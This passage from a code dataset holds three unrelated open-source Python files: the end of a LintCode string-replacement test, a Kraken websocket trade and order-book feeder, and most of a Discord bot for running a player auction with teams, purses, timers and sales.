            ('LintCode and Jiuzhang', 21, 'LintCode%20and%20Jiuzhang', 25),
            (' ', 1, '%20', 3),
        ]
        for text, length, expected, expected_length in cases:
            # Pad with empty slots so the array has room for the expansion.
            buf = list(text) + [''] * (len(expected) - length)
            returned = replace_blank(buf, length)
            self.assertListEqual(list(expected), buf)
            self.assertEqual(expected_length, returned)
if __name__ == '__main__':
unittest.main()
| corenel/lintcode | algorithms/212_space_replacement.py | 212_space_replacement.py | py | 2,777 | python | en | code | 1 | github-code | 13 |
import json
from tradingkit.data.feed.websocket_feeder import WebsocketFeeder
from tradingkit.pubsub.event.book import Book
from tradingkit.pubsub.event.trade import Trade
class PublicKrakenFeeder(WebsocketFeeder):
# Converts symbols from normal to kraken vocab
denormalized_symbol = {
"BTC/EUR": "XBT/EUR",
"BTC/USD": "XBT/USD",
"BTC/USDT": "XBT/USDT",
"ETH/BTC": "ETH/XBT",
}
# Converts symbols from kraken to normal vocab
normalized_symbol = {
"XBT/EUR": "BTC/EUR",
"XBT/USD": "BTC/USD",
"XBT/USDT": "BTC/USDT",
"ETH/XBT": "ETH/BTC",
}
orderbooks = {}
ws_errors = [
"ping/pong timed out",
"Connection to remote host was lost."
]
def __init__(self, symbol):
super().__init__(symbol, None, "wss://ws.kraken.com")
def on_open(self, ws):
ws.send(json.dumps({
'event': 'subscribe',
'subscription': {'name': 'trade'},
'pair': [self.denormalized_symbol[self.symbol]]
}))
ws.send(json.dumps({
'event': 'subscribe',
'subscription': {'name': 'book'},
'pair': [self.denormalized_symbol[self.symbol]]
}))
def on_message(self, ws, message):
data = json.loads(message)
if "trade" in data:
trade_data_list = self.transform_trade_data(data)
for trade_data in trade_data_list:
self.dispatch(Trade(trade_data))
elif "book-10" in data:
order_book = self.transform_book_data(data)
self.dispatch(Book(order_book))
def transform_book_data(self, data):
keys = data[1].keys()
symbol = self.normalized_symbol[data[-1]]
if "as" in keys:
self.orderbooks[symbol] = {
"bids": [
[
float(data[1]["bs"][0][0]),
float(data[1]["bs"][0][1])
]
],
"asks": [
[
float(data[1]["as"][0][0]),
float(data[1]["as"][0][1])
]
],
"timestamp": int(float(data[1]["as"][0][2]) * 1000),
"symbol": symbol,
'exchange': 'kraken'
}
else:
if "a" in keys:
self.orderbooks[symbol]["asks"] = [
[
float(data[1]["a"][0][0]),
float(data[1]["a"][0][1])
]
]
self.orderbooks[symbol]["timestamp"] = int(float(data[1]["a"][0][2]) * 1000)
self.orderbooks[symbol]["symbol"] = symbol
self.orderbooks[symbol]["exchange"] = 'kraken'
if "b" in keys:
self.orderbooks[symbol]["bids"] = [
[
float(data[1]["b"][0][0]),
float(data[1]["b"][0][1])
]
]
self.orderbooks[symbol]["timestamp"] = int(float(data[1]["b"][0][2]) * 1000)
self.orderbooks[symbol]["symbol"] = symbol
self.orderbooks[symbol]["exchange"] = 'kraken'
return self.orderbooks[symbol]
def transform_trade_data(self, data):
trade_data_list = []
symbol = self.normalized_symbol[data[-1]]
for trade in data[1]:
price = float(trade[0])
amount = float(trade[1])
cost = float(trade[0]) * float(trade[1])
timestamp = int(float(trade[2]) * 1000)
side = 'buy' if trade[3] == 'b' else 'sell'
type = 'market' if trade[4] == 'm' else 'limit'
trade_data = {
'price': price,
'amount': amount,
'cost': cost,
'timestamp': timestamp,
'side': side,
'type': type,
'symbol': symbol,
'exchange': 'kraken'
}
trade_data_list.append(trade_data)
return trade_data_list
| logictraders/tradingkit | src/tradingkit/data/feed/public_kraken_feeder.py | public_kraken_feeder.py | py | 4,159 | python | en | code | 3 | github-code | 13 |
import discord
from discord.ui import Button, View
from discord import InteractionType
import os
import random
import copy
import asyncio
import random
import pytz
from datetime import datetime
import json
import pickle
from keep_alive import keep_alive
import csv
# Start the keep-alive web server so the hosting platform doesn't idle us out.
keep_alive()

timer_running = False
counter = 0
sales_channel = None
user_notifications = {}

# Locate the most recent checkpoint file (data_<N>.pkl) to resume from.
pkls = []
for entry in os.listdir():
    if entry.endswith(".pkl"):
        # BUG FIX: the original stripped ".pkl"/"data_" from the wrong
        # variable, collecting names like "5.pkl" and then picking the
        # "highest" one by string comparison (where "9" > "10").
        number = entry.removesuffix(".pkl").removeprefix("data_")
        if number.isdigit():
            pkls.append(number)
print(pkls)
if len(pkls) != 0:
    # Compare numerically and rebuild the full file name (incl. extension).
    filename = "data_" + str(max(pkls, key=int)) + ".pkl"
else:
    filename = None
def load_data(filename):
    """Load pickled auction state from *filename*.

    Returns the unpickled object, or None when the file is missing (first
    run) or cannot be deserialised.
    """
    try:
        with open(filename, 'rb') as fh:
            return pickle.load(fh)
    except FileNotFoundError:
        # Normal on the very first run: there is no checkpoint yet.
        return None
    except Exception as e:
        # Corrupt or incompatible checkpoint file.
        print(f"Error loading data: {e}")
        return None
def save_data(data_to_save):
    """Pickle the auction state to data_<counter+1>.pkl and prune old files.

    Keeps only the two most recent checkpoints so a corrupt write never
    destroys the last good snapshot.
    """
    global counter
    try:
        # Next checkpoint number / file name.
        counter += 1
        target = f'data_{counter}.pkl'
        with open(target, 'wb') as out:
            pickle.dump(data_to_save, out)
        # Remove every checkpoint older than the previous one.
        for old_index in range(1, counter - 1):
            old_file = f'data_{old_index}.pkl'
            if os.path.exists(old_file):
                os.remove(old_file)
                print(f"Deleted {old_file}.")
        print(f"Data saved to {target} successfully.")
    except Exception as e:
        print(f"Error saving data: {e}")
MAX_PURSE = 100   # starting budget per team
MAX_PLAYERS = 25  # roster cap per team
# Mutable auction state; rebound as the auction progresses / on restore.
current_auction_set = None
current_player = None
current_player_price = None
unsold_players = set()
intents = discord.Intents.default()
intents.message_content = True  # privileged intent: required to read messages
client = discord.Client(intents=intents)
# Per-team state; presumably keyed by short team name -- populated at runtime.
teams = {}
full_team_names = {}
purse = {}
team_colors = {}
with open("auction_sets.json", "r") as players_file:
    auction_sets = json.load(players_file)
# Pristine copy so the auction can be reset/replayed later.
copy_auction_sets = copy.deepcopy(auction_sets)
# Load base prices from base_prices.json
with open("base_prices.json", "r") as base_prices_file:
    base_prices = json.load(base_prices_file)
# Load set colors from set_colors.json
with open("set_colors.json", "r") as set_colors_file:
    embed_colors = json.load(set_colors_file)
def is_auctioneer(user):
    """Return True when the member carries the 'Auctioneer' role."""
    return any(role.name == 'Auctioneer' for role in user.roles)
# Chronological log of auction events ('sale' and 'trade' dicts).
sale_history = []

# All user-facing timestamps are rendered in Indian Standard Time.
ist = pytz.timezone('Asia/Kolkata')
# Helpers below format the current time in IST.
def get_current_ist_time():
    """Return the current time as a 'YYYY-mm-dd HH:MM:SS IST' string."""
    now_ist = datetime.now(pytz.utc).astimezone(ist)
    return now_ist.strftime("%Y-%m-%d %H:%M:%S IST")
def get_event_timestamp():
    """Return the IST timestamp (without suffix) used in sale_history entries."""
    return datetime.now(ist).strftime("%Y-%m-%d %H:%M:%S")
def add_sale(team_name, player_name, price):
    """Append a completed sale to the global sale_history log."""
    event = {
        'type': 'sale',
        'timestamp': get_event_timestamp(),
        'team_name': team_name,
        'player_name': player_name,
        'price': price,
    }
    sale_history.append(event)
def add_trade(team1_name, team2_name, player1_name, player2_name):
    """Append a timestamped trade record to the global sale history."""
    record = {
        'type': 'trade',
        'timestamp': get_event_timestamp(),
        'team_1': team1_name,
        'team_2': team2_name,
        'player_1': player1_name,
        'player_2': player2_name,
    }
    sale_history.append(record)
# Snapshot of all auction state, used for persistence.
# NOTE(review): this dict captures references to the objects bound at import
# time; code that later REBINDS these globals (rather than mutating them in
# place) is not reflected here — verify before relying on it for saves.
auction_data = {
    'teams': teams,
    'purse': purse,
    'auction_sets': auction_sets,
    'sale_history': sale_history,
    'unsold_players': unsold_players,
    'full_team_names': full_team_names,
    'team_colors': team_colors,
    'current_auction_set': current_auction_set,
    'current_player': current_player,
    'current_player_price': current_player_price,
}
#############################################################
# Events:
#############################################################
@client.event
async def on_ready():
    """Restore persisted auction state (if any) when the bot connects.

    Loads the newest pickle snapshot when one exists, deletes all ``.pkl``
    files from disk afterwards, and otherwise initialises every global to
    its empty/default value.
    """
    global teams, purse, auction_sets, sale_history, unsold_players, full_team_names, team_colors, user_notifications, current_player_price, current_player, current_auction_set, filename, pkls
    print('We have logged in as {0.user}'.format(client))
    # Load data from the pickle file at the start of the bot
    # NOTE(review): `pkls`, `filename` and `load_data` are presumably set up
    # during startup elsewhere in this file — confirm before relying on them.
    if pkls != []:
        loaded_data = load_data(filename)
    else:
        loaded_data = None
    # Remove every snapshot on disk; state now lives in memory until the
    # next save_data() call writes a fresh file.
    for files in os.listdir():
        if files.endswith(".pkl"):
            os.remove(files)
    if loaded_data is not None:
        # Extract individual components as needed
        teams = loaded_data.get('teams', {})
        purse = loaded_data.get('purse', {})
        auction_sets = loaded_data.get('auction_sets', auction_sets)
        sale_history = loaded_data.get('sale_history', [])
        unsold_players = loaded_data.get('unsold_players', set())
        full_team_names = loaded_data.get('full_team_names', {})
        team_colors = loaded_data.get('team_colors', team_colors)
        current_player_price = loaded_data.get('current_player_price', None)
        current_player = loaded_data.get('current_player', None)
        current_auction_set = loaded_data.get('current_auction_set', None)
        user_notifications = loaded_data.get('user_notifications', {})
        # Extract more data as needed
    else:
        # Handle the case where no data was loaded (e.g., first run)
        # Initialize data structures as needed
        teams = {}
        purse = {}
        auction_sets = copy.deepcopy(copy_auction_sets)
        full_team_names = {}
        sale_history = []
        unsold_players = set()
        team_colors = {}
        current_auction_set = None
        current_player = None
        current_player_price = None
        user_notifications = {}
#############################################################
# Message:
#############################################################
@client.event
async def on_message(message):
    """Dispatch every ``$``-prefixed chat message to the matching command.

    Auctioneer-only commands are guarded by ``is_auctioneer``.  After any
    command the full auction state is persisted via ``save_data`` and the
    triggering message is deleted; any exception is printed and the state
    is saved anyway so a bad command cannot lose data.
    """
    global current_auction_set
    global current_player
    global sales_channel
    # Ignore the bot's own messages.
    if message.author == client.user:
        return
    content = message.content
    user = message.author
    if content.startswith('$'):
        try:
            cmd = content[1:]
            # Reset auction
            if cmd == 'ping':
                # calculate ping time
                ping = round(client.latency * 1000)
                await message.channel.send('Pong! {}ms'.format(ping))
            # NOTE(review): this `if` starts a second chain, so a 'ping'
            # command also falls through the elifs below — confirm intended.
            if cmd == 'reset' and is_auctioneer(user):
                await reset_sets_teams(message.channel)
            # Shows all sets
            elif cmd == 'sets':
                await show_sets(message.channel)
            # Pops a player
            elif cmd in auction_sets and is_auctioneer(user):
                await pop_and_send(cmd, message.channel)
            # Starts a timer
            elif cmd.startswith('timer '):
                cmd_args = cmd.split(' ')
                await timer(cmd_args[1], message.channel)
            elif cmd == 'timer':
                await timer('10', message.channel)
            # Adds a new team
            elif cmd.startswith('add ') and is_auctioneer(user):
                cmd_args = cmd.split(' ')
                team_name = cmd_args[1]
                color_arg = cmd_args[2] if len(cmd_args) > 2 else None
                full_name = ' '.join(cmd_args[3:])
                await add_team(team_name, full_name, color_arg, message.channel)
            # Shows details of all teams
            elif cmd == 'teams':
                await show_teams(message.channel)
            # Sells the player to a team
            elif cmd.startswith('sell') and is_auctioneer(user):
                cmd_args = cmd.split(' ')
                team_name = cmd_args[1]
                price = cmd_args[2]
                name = ' '.join(cmd_args[3:])
                await sell_team(team_name, price, name, message.channel)
            # Shows specified team details
            # NOTE(review): substring match against the stringified key view —
            # partial team names also match; confirm this looseness is wanted.
            elif cmd.lower() in str(teams.keys()).lower():
                await show_team(cmd, message.channel)
            # Shows Help embed
            elif cmd == 'help':
                await show_help(message.channel)
            # Shows specific set
            elif cmd.startswith('set '):
                cmd_args = cmd.split(' ')
                set_name = cmd_args[1]
                await show_set(set_name, message.channel)
            # Shows sales and trades that occurred
            elif cmd == 'sales':
                await show_sales(message.channel)
            # Sets Maximum purse for all teams
            elif cmd.startswith('setmaxpurse ') and is_auctioneer(user):
                cmd_args = cmd.split(' ')
                if len(cmd_args) == 2:
                    await set_max_purse(cmd_args[1], message.channel)
                else:
                    await message.channel.send(
                        "Invalid usage. Please use: $setmaxpurse <value>")
            # Trade
            elif cmd.startswith('trade ') and is_auctioneer(user):
                cmd_args = cmd.split(' ')
                if len(cmd_args) < 5:
                    # Invalid trade command, show an error message
                    embed = discord.Embed(title="Invalid Trade Command",
                                          color=discord.Color.red())
                    embed.add_field(name="Usage",
                                    value="$trade <team1> <team2> <player1> <player2>")
                    await message.channel.send(embed=embed)
                else:
                    team1_name = cmd_args[1]
                    team2_name = cmd_args[2]
                    players = ' '.join(cmd_args[3:])
                    await trade(team1_name, team2_name, players, message.channel)
            elif cmd.startswith('setmaxplayers ') and is_auctioneer(user):
                cmd_args = cmd.split(' ')
                if len(cmd_args) == 2:
                    await set_max_players(cmd_args[1], message.channel)
                else:
                    await message.channel.send(
                        "Invalid usage. Please use: $setmaxplayers <value>")
            # Remove player command
            elif cmd.startswith('removeplayer ') and is_auctioneer(user):
                cmd_args = cmd.split(' ')
                if len(cmd_args) == 3:
                    team_name = cmd_args[1]
                    player_name = cmd_args[2]
                    await remove_player(team_name, player_name, message.channel)
                else:
                    # Invalid usage of the removeplayer command
                    embed = discord.Embed(
                        title="Invalid Remove Player Command",
                        description="Usage: $removeplayer <team_name> <player_name>",
                        color=discord.Color.red())
                    await message.channel.send(embed=embed)
            # Selling current player
            elif cmd.startswith('sold ') and is_auctioneer(user):
                # (re-declaring these globals is redundant — they are already
                # declared at the top of this function — but harmless)
                global current_auction_set
                global current_player
                cmd_args = content.split(' ')
                team = cmd_args[1]
                price = cmd_args[2]
                if current_player is not None:
                    await sell_team(team, price, current_player, message.channel)
                else:
                    await message.channel.send(
                        "No player available to sell. Use $<set_name> to pop a player first."
                    )
            # Requesting a player
            elif cmd.startswith('request '):
                cmd_args = cmd.split(' ')
                if len(cmd_args) > 1:
                    requested_player = ' '.join(cmd_args[1:])
                    await request_player(user, requested_player, message.channel)
                else:
                    await message.channel.send(
                        "Invalid usage. Please use: $request <player_name>")
            # Marking current player as unsold
            elif cmd == 'unsold' and is_auctioneer(user):
                await unsold(message.channel)
            # Getting a random unsold player
            elif cmd == 'getunsold' and is_auctioneer(user):
                await get_unsold(message.channel)
            # Showing unsold players
            elif cmd == 'showunsold':
                await show_unsold(message.channel)
            # Set the sales channel
            elif cmd.startswith('saleschannel') and is_auctioneer(user):
                args = cmd.split(' ')
                if len(args) == 2:
                    channel_id = int(args[1])
                    channel = client.get_channel(channel_id)
                    if channel is not None:
                        sales_channel = channel
                        await message.channel.send(f"Sales channel set to {sales_channel}")
                    else:
                        await message.channel.send("Invalid channel ID.")
            # Remove a team
            elif cmd.startswith('removeteam') and is_auctioneer(user):
                args = cmd.split(' ')
                if len(args) == 2:
                    team_name = args[1]
                    await remove_team(team_name, message.channel)
                else:
                    await message.channel.send("Invalid usage. Please use: $removeteam <team_name>")
            # Export
            elif cmd == 'export' and is_auctioneer(user):
                await export(message.channel)
            elif cmd.startswith('notify '):
                cmd_args = cmd.split(' ')
                players_to_notify = ' '.join(cmd_args[1:]).split(',')
                players_to_notify = [player.strip()
                                     for player in players_to_notify]
                user_notifications[user.id] = players_to_notify
                await message.author.send(
                    f"You will be notified when these players are live in auction: {', '.join(players_to_notify)}"
                )
            # Persist the complete auction state after every command.
            save_data({
                'teams': teams,
                'purse': purse,
                'auction_sets': auction_sets,
                'sale_history': sale_history,
                'unsold_players': unsold_players,
                'full_team_names': full_team_names,
                'team_colors': team_colors,
                'current_auction_set': current_auction_set,
                'current_player': current_player,
                'current_player_price': current_player_price,
                'user_notifications': user_notifications
            })
            await message.delete()
        # Broad on purpose: a malformed command (e.g. missing arguments)
        # must never crash the bot; the state is still saved below.
        except Exception as e:
            print(e)
            save_data({'teams': teams,
                       'purse': purse,
                       'auction_sets': auction_sets,
                       'sale_history': sale_history,
                       'unsold_players': unsold_players,
                       'full_team_names': full_team_names,
                       'team_colors': team_colors,
                       'current_auction_set': current_auction_set,
                       'current_player': current_player,
                       'current_player_price': current_player_price,
                       'user_notifications': user_notifications})
#############################################################
# Reset:
#############################################################
async def reset_sets_teams(channel):
    """Ask for confirmation, then wipe all teams, purses and auction state.

    Bug fixed: on confirmation the original called ``save_data(auction_data)``,
    but ``auction_data`` was built once at import time and kept references to
    the PRE-reset objects (the reset rebinds the globals to new containers),
    so the persisted snapshot was stale.  A fresh dict of the current
    globals — including ``user_notifications`` — is saved instead, matching
    the payload saved by ``on_message``.
    """
    # Create an embed for the confirmation message
    confirmation_embed = discord.Embed(
        title="Reset Confirmation",
        description="WARNING: This action will reset all sets and teams.",
        color=discord.Color.from_str("#FFFFFF"))
    confirmation_embed.add_field(
        name="Confirmation:", value="Are you sure you want to reset all sets and teams?")
    # Send the confirmation embed with Confirm / Cancel buttons
    confirmation_message = await channel.send(embed=confirmation_embed)
    confirm = Button(style=discord.ButtonStyle.green, label="Confirm")
    cancel = Button(style=discord.ButtonStyle.red, label="Cancel")
    view = View()
    view.add_item(confirm)
    view.add_item(cancel)
    await confirmation_message.edit(view=view)

    async def confirmed(interaction):
        # Auctioneer pressed Confirm on THIS message: reset everything.
        global teams, purse, auction_sets, sale_history, unsold_players, full_team_names, team_colors, user_notifications, current_player_price, current_player, current_auction_set, filename, pkls
        if interaction.message == confirmation_message and is_auctioneer(interaction.user):
            teams = {}
            purse = {}
            auction_sets = copy.deepcopy(copy_auction_sets)
            full_team_names = {}
            sale_history = []
            unsold_players = set()
            team_colors = {}
            current_auction_set = None
            current_player = None
            current_player_price = None
            user_notifications = {}
            # Persist the freshly reset state (not the stale import-time snapshot).
            save_data({
                'teams': teams,
                'purse': purse,
                'auction_sets': auction_sets,
                'sale_history': sale_history,
                'unsold_players': unsold_players,
                'full_team_names': full_team_names,
                'team_colors': team_colors,
                'current_auction_set': current_auction_set,
                'current_player': current_player,
                'current_player_price': current_player_price,
                'user_notifications': user_notifications,
            })
            success_embed = discord.Embed(
                title="Reset Successful",
                description="All sets and teams have been reset.",
                color=discord.Color.green())
            await channel.send(embed=success_embed)
            await confirmation_message.delete()
            return

    async def cancel_check(interaction):
        # Auctioneer pressed Cancel: abort the reset.
        if interaction.message == confirmation_message and is_auctioneer(interaction.user):
            cancel_embed = discord.Embed(title="Reset Canceled",
                                         description="Reset operation canceled.",
                                         color=discord.Color.red())
            await channel.send(embed=cancel_embed)
            await confirmation_message.delete()
            return
    confirm.callback = confirmed
    cancel.callback = cancel_check
#############################################################
# Show Sets:
#############################################################
async def show_sets(channel):
    """Post one embed listing every auction set with its base price and players."""
    overview = discord.Embed(title='Auction Sets', color=discord.Color.blue())
    for set_name, players in auction_sets.items():
        overview.add_field(
            name=f'{set_name.capitalize()}: {base_prices[set_name]}',
            value=', '.join(players),
            inline=False)
    await channel.send(embed=overview)
#############################################################
# Show Set:
#############################################################
async def show_set(set_name, channel):
    """Post an embed with the base price and remaining players of one set."""
    header = f'Base Price: **{base_prices[set_name]}**\nRemaining players:\n\n'
    body = ''.join(f'**{player}**\n' for player in auction_sets[set_name])
    # Set colours may be stored either as "#RRGGBB" strings or raw ints.
    raw_color = embed_colors.get(set_name, "blue")
    if isinstance(raw_color, str):
        color = discord.Color.from_str(raw_color)
    else:
        color = discord.Color(value=raw_color)
    card = discord.Embed(title=f'{set_name.capitalize()}',
                         description=header + body,
                         color=color)
    await channel.send(embed=card)
#############################################################
# Set Max Purse:
#############################################################
async def set_max_purse(new_max_purse, channel):
    """Set the purse (in crores) that newly created teams start with.

    Parameters
    ----------
    new_max_purse : str
        User-supplied value; must parse as a non-negative float.
    channel
        Discord channel to report the result in.

    Cleanup: removed the pointless ``f`` prefixes on placeholder-free
    strings and narrowed the ``try`` body to the line that can raise.
    """
    global MAX_PURSE
    try:
        new_max_purse = float(new_max_purse)
    except ValueError:
        embed = discord.Embed(
            title="Maximum Purse",
            description="Invalid value for the maximum purse. Please provide a numeric value.",
            color=discord.Color.red())
        await channel.send(embed=embed)
        return
    if new_max_purse >= 0:
        MAX_PURSE = new_max_purse
        embed = discord.Embed(
            title="Maximum Purse",
            description=f"The maximum purse has been set to {MAX_PURSE}Cr.",
            color=discord.Color.green())
    else:
        embed = discord.Embed(
            title="Maximum Purse",
            description="Please provide a non-negative value.",
            color=discord.Color.red())
    await channel.send(embed=embed)
#############################################################
# Set Max Players:
#############################################################
async def set_max_players(new_max_players, channel):
    """Set the maximum squad size a team may buy up to.

    Parameters
    ----------
    new_max_players : str
        User-supplied value; must parse as a non-negative int.
    channel
        Discord channel to report the result in.

    Cleanup: removed the pointless ``f`` prefixes on placeholder-free
    strings and narrowed the ``try`` body to the line that can raise.
    """
    global MAX_PLAYERS
    try:
        new_max_players = int(new_max_players)
    except ValueError:
        embed = discord.Embed(
            title="Maximum Players",
            description="Invalid value for the maximum players. Please provide a numeric value.",
            color=discord.Color.red())
        await channel.send(embed=embed)
        return
    if new_max_players >= 0:
        MAX_PLAYERS = new_max_players
        embed = discord.Embed(
            title="Maximum Players",
            description=f"The maximum players has been set to {MAX_PLAYERS}.",
            color=discord.Color.green())
    else:
        embed = discord.Embed(
            title="Maximum Players",
            description="Please provide a non-negative value.",
            color=discord.Color.red())
    await channel.send(embed=embed)
#############################################################
# Timer:
#############################################################
async def deny_timer(channel):
    """Return True (after a brief, self-deleting warning) if a timer is already running."""
    global timer_running
    if not timer_running:
        return False  # permission granted
    warning = discord.Embed(
        title="Timer Already Running",
        description="A timer is currently running. You cannot start a new timer until the current one finishes.",
        color=discord.Color.red())
    notice = await channel.send(embed=warning)
    await asyncio.sleep(2)
    await notice.delete()
    return True  # denied
async def timer(secs, channel):
    """Run a visible countdown of *secs* seconds (1-30) with a Stop button.

    Only one timer may run at a time (see ``deny_timer``); auctioneers can
    abort the countdown early via the Stop button.

    Bug fixed: the loop slept 0.5 s per tick while counting down one full
    second per tick (the original comment even said "1 second per
    interval"), so every timer finished in half the requested time.
    """
    global timer_running
    if await deny_timer(channel):
        return
    # Callers pass a string; fall back to 10 seconds when nothing is given.
    if secs is None:
        secs = 10
    else:
        secs = int(secs)
    if secs > 30 or secs < 1:
        embed = discord.Embed(
            title="Timer",
            description="Timer cannot be set for more than 30 seconds and less than 1 second.",
            color=discord.Color.red())
        await channel.send(embed=embed)
        return
    timer_running = True

    def check_stop(interaction):
        # Only auctioneers may stop, and only via this timer's own message.
        return is_auctioneer(interaction.user) and interaction.message == timer_message

    async def update_timer_message(embed, remaining_time):
        embed.description = f"Remaining time: {remaining_time}"
        await timer_message.edit(embed=embed)
    embed = discord.Embed(title="Timer",
                          description=f"Remaining time: {secs}",
                          color=discord.Color.blue())
    timer_message = await channel.send(embed=embed)
    view = View()
    stop_button = Button(style=discord.ButtonStyle.danger, label="Stop")
    view.add_item(stop_button)
    # Flag flipped by the Stop button callback.
    timer_stopped = False

    async def on_button_click(interaction):
        nonlocal timer_stopped
        global timer_running
        if check_stop(interaction):
            timer_stopped = True
            timer_running = False
    # Set the button callback
    stop_button.callback = on_button_click
    await timer_message.edit(view=view)
    for remaining_time in range(secs - 1, 0, -1):
        await asyncio.sleep(1)  # one real second per displayed second (was 0.5)
        await update_timer_message(embed, remaining_time)
        # Check if the timer should be stopped
        if timer_stopped:
            await timer_message.edit(
                embed=discord.Embed(
                    title="Timer",
                    description="Timer has been stopped!",
                    color=discord.Color.red()),
                view=None)
            timer_running = False
            return
    await timer_message.edit(embed=discord.Embed(
        title="Timer", description="Time's up!", color=discord.Color.red()), view=None)
    embed = discord.Embed(title="Timer",
                          description="Time's up!",
                          color=discord.Color.red())
    embed.set_thumbnail(
        url="https://cdn.discordapp.com/emojis/880003196339236884.png")
    timer_running = False
    await channel.send(embed=embed)
#############################################################
# Pop Players:
#############################################################
async def pop_and_send(set_name, channel):
    """Draw a random player from *set_name*, announce them, notify subscribers."""
    global teams, purse, auction_sets, sale_history, unsold_players, full_team_names, team_colors, current_player_price, current_player, current_auction_set
    # The pending sale must be completed before the next player is drawn.
    if current_player is not None:
        await complete_sale(channel)
        return None
    if set_name not in auction_sets:
        await channel.send(f'Invalid set name: {set_name.capitalize()}')
        return None
    remaining = auction_sets[set_name]
    if not remaining:
        await channel.send(f'{set_name.capitalize()} is empty.')
        return None
    player = random.choice(remaining)
    remaining.remove(player)
    current_auction_set = set_name
    base_price = base_prices.get(set_name, 'Unknown')
    current_player_price = base_price
    # Set colours may be "#RRGGBB" strings or raw ints.
    raw_color = embed_colors.get(set_name, "blue")
    if isinstance(raw_color, str):
        color = discord.Color.from_str(raw_color)
    else:
        color = discord.Color(value=raw_color)
    card = discord.Embed(title=f"Player: {player}",
                         description=f'Base Price: {base_price}',
                         color=color)
    image_path = f'images/{player}.png'
    if os.path.isfile(image_path):
        attachment = discord.File(image_path, filename='Player.png')
        card.set_image(url="attachment://Player.png")
        await channel.send(file=attachment, embed=card)
    else:
        await channel.send(embed=card)
    current_player = player
    # DM every user who signed up for a ping on this player.
    for user_id, players_to_notify in user_notifications.items():
        if player in players_to_notify:
            subscriber = await client.fetch_user(user_id)
            if subscriber:
                await subscriber.send(f"**{player}** is live in the auction!")
    return None
#############################################################
# Adding Teams:
#############################################################
async def add_team(team_name, full_team_name, color_arg, channel):
    """Register a new team with a full name, optional hex colour, and a fresh purse."""
    if team_name in teams:
        # Abbreviation already taken — report and bail out.
        duplicate = discord.Embed(
            title=f'Team Already Exists: {team_name}',
            description=f'Team {team_name} already exists as "{full_team_names[team_name]}".',
            color=discord.Color.red())
        await channel.send(embed=duplicate)
        return
    # Fall back to the abbreviation when no full name was supplied.
    if not full_team_name:
        full_team_name = team_name
    teams[team_name] = {}
    full_team_names[team_name] = full_team_name
    purse[team_name] = MAX_PURSE
    if color_arg:
        try:
            # Hex colour code -> Color object.
            team_colors[team_name] = discord.Color(int(color_arg, 16))
        except ValueError:
            pass  # silently ignore malformed hex codes
    announcement = discord.Embed(
        title=f'Team Created: {full_team_name}({team_name})',
        description=f'Team "{full_team_name}" has been created with a purse of {MAX_PURSE:.2f}Cr.',
        color=discord.Color.green())
    if color_arg:
        announcement.color = team_colors.get(team_name, discord.Color.green())
    await channel.send(embed=announcement)
#############################################################
# Showing Teams:
#############################################################
async def show_teams(channel):
    """Post one embed per team showing its purse and purchased players.

    Cleanup: the original kept a never-used ``team_logo`` list and
    accumulated embeds in ``team_info`` only to test it for emptiness with
    ``if team_info: pass``; the empty case is now tested on ``teams``
    directly, with identical messages.
    """
    if not teams:
        await channel.send('No teams created yet.')
        return
    for team_name, players in teams.items():
        purse_amount = purse.get(team_name, 0)
        players_list = ", ".join(players.keys()) if players else "None"
        # Get the stored team color or default to green
        color = team_colors.get(team_name, discord.Color.green())
        embed = discord.Embed(
            title=f'Team: {full_team_names[team_name]}',
            description=f'Purse: **{purse_amount:.2f}Cr**\nPlayers: {players_list}\n',
            color=color)
        # Attach the team logo as a thumbnail when one exists on disk.
        team_image_file = f'teams/{team_name}.png'
        if os.path.isfile(team_image_file):
            team_image = discord.File(
                team_image_file, filename='Team.png')
            embed.set_thumbnail(
                url="attachment://Team.png")
            await channel.send(file=team_image, embed=embed)
        else:
            await channel.send(embed=embed)
#############################################################
# Selling Players:
#############################################################
async def sell_team(team_name, price, name, channel):
    """Sell player *name* to *team_name* for *price* and announce the sale.

    ``price`` is an integer string; it is divided by 100 before being
    charged against the purse — presumably lakhs -> crores, TODO confirm.
    Enforces the MAX_PLAYERS squad limit and the team's remaining purse,
    records the sale in the history, and removes the player from whichever
    auction set still lists them.

    NOTE(review): ``int(price)`` raises ValueError on bad input and
    ``if sales_channel:`` raises NameError if $saleschannel was never used;
    both appear to rely on on_message's broad except — confirm.
    """
    global teams, purse, auction_sets, sale_history, unsold_players, full_team_names, team_colors, current_player_price, current_player, current_auction_set, sales_channel
    if team_name in teams:
        player_price = int(price)
        if len(teams[team_name]) >= MAX_PLAYERS:
            # Create an embedded message to indicate that the team has reached the player limit
            embed = discord.Embed(
                title=f'Team Player Limit Reached: {team_name}',
                description=f'Team {team_name} has reached the maximum player limit of {MAX_PLAYERS} players.',
                color=discord.Color.red())
            await channel.send(embed=embed)
        else:
            if player_price / 100 <= purse[team_name]:
                teams[team_name][name] = player_price
                purse[team_name] -= player_price / 100
                add_sale(full_team_names[team_name], name, player_price / 100)
                # Get the stored team color or default to green
                color = team_colors.get(team_name, discord.Color.green())
                # Create an embedded message to announce the player sale
                embed = discord.Embed(
                    title=f'Player Sold: {name}',
                    description=f'**{name}** has been sold to **{full_team_names[team_name]}** for **{player_price/100:.2f}Cr**.',
                    color=color)
                player_image_file = f'images/{name}.png'
                team_image_file = f'teams/{team_name}.png'
                files = []  # List to store files to be sent as attachments
                if os.path.isfile(player_image_file):
                    player_image = discord.File(
                        player_image_file, filename='Player.png')
                    files.append(player_image)
                    # Player image as an attachment
                    embed.set_image(url="attachment://Player.png")
                if os.path.isfile(team_image_file):
                    team_image = discord.File(
                        team_image_file, filename='Team.png')
                    files.append(team_image)
                    embed.set_thumbnail(
                        url="attachment://Team.png")  # Team image as a thumbnail
                await channel.send(files=files, embed=embed)
                if sales_channel:
                    await sales_channel.send(embed=embed)  # type: ignore
                # Drop the sold player from whichever set still lists them
                # (covers $sold on a popped player and manual $sell alike).
                for set_name, players in auction_sets.items():
                    if name in players:
                        players.remove(name)
                current_player = None  # Reset the current player name
                current_auction_set = None  # Reset the current auction set name
            else:
                embed = discord.Embed(
                    title=f'Team Over Budget!: {team_name}',
                    description=f'Team "{team_name}" has exceeded their maximum budget.',
                    color=discord.Color.red())
                await channel.send(embed=embed)
    else:
        # Create an embedded message to indicate that the team doesn't exist
        embed = discord.Embed(title=f'Team Not Found: {team_name}',
                              description=f'Team "{team_name}" does not exist.',
                              color=discord.Color.red())
        await channel.send(embed=embed)
##################################################################
# Unsold:
##################################################################
async def unsold(channel):
    """Mark the player currently on the block as unsold and stash them for later."""
